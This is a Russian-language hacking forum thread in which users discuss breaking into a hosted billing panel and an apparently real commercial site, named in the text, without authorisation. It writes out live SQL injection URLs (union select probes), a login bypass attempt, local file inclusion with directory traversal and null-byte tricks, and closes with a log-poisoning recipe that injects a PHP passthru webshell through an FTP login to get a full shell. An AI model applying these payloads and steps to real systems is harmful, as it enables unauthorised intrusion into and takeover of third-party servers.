Вот есть такая панель с демо входом, находится на хостинге, при подстановки в адресную строку: http://****host.net/billing/faq.php?category=1&identry=1&mod=comment&start=1' появляется эта надпись: Так, а вот ломать скрипт нельзя! Тренируйся лучше на... кошках пробывал на XSS не чего не изменяется на данном сайте нет не форума не гостивой.... что небуть подскажите куда двигаться в плане взлома.
Nmap -- проверь сервиса! Чекни на domainsdb.net --может есть еще сайты на сервере. Кста там не Abills billing system <= 0.24.f2, если да , то топай на -- http://nst.void.ru/?q=papers&cat_where=advisories&show=23
Нет там стоит BPanel v2.8 Beta2 SE, на остальных сайтах пока я просмотрел 15 везде статические страници, не одной динамической , (не формов не чего)
http://biznesprom.ru/index.php?categoryID=-6761' появляется эта ошибка: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 при вводе:http://biznesprom.ru/index.php?categoryID=-6761+union+select+1/* всё нормально а при вводе: http://biznesprom.ru/index.php?categoryID=-6761+union+select+1,2/* http://biznesprom.ru/index.php?categoryID=-6761+union+select+1,2/*
http://biznesprom.ru/index.php?categoryID=-6761+union+select+31337/* скл иньекция есть. но к сожалению не выводит ничего. А вот в логине есть скуль, позволяющая обойти авторизацию
Это как нибуть связанно с этим кодом: PHP: <form action="index.php" method=post> <tr> <td> <table border=0> <input type="hidden" name="enter" value="1"> <tr> <td align=right><font class=light>Логин:</font></td> <td><input type="text" class=ss name="user_login" size=10></td> </tr> <tr> <td align=right><font class=light>Пароль:</font></td> <td><input name="user_pw" class=ss type="password" size=10></td> </tr> в смысле мне надо в командную строку в браузере вводить запрос или можно в само форму авторизации , сейчас попробывал вставлять : ""or "1"="1" не чего не получилось , ну чтож буду сейчас учить матчасть ( читать статьи)
Пробывал подставлять и : http://biznesprom.ru/index.php?aux_page=../orderform/letter/contacts.php и остальные варианты с раширением php показывет что """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" Извините, запрашиваемый документ не был найден на сервере """""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" но при этом при вставке: http://biznesprom.ru/index.php?aux_page=../images/design/n_02.jpg показует составляющую рисунка (исходник не знаю какправильно назвать) удалённо тоже не чего не инклудится , тоесть локальный инклуд ? пробыва добовлять в конец %00 тоже без результатно , брут не подходит так как сижу на диалупе.
Ядовитый 0 работает.. то есть, что можем из этого извлечь. МЫ находим любые логи (возбмем к примеру логи фтп-шника или сервера (для поисков логов фтпшника нам в помощь приходи http://biznesprom.ru/index.php?aux_page=../../../../../../../../../../../../../etc/proftpd.conf ) .. затем.. если фтп - то .. пытаемся залогиниться на сервер с логином.. ну например <? @passthru($cmd); ?> ... что естественно отображается в логах (неправтльный лог.. значит в еррор-логе) . Инклудим лог, ставим %00 , и у нас есть полноценный шелл.
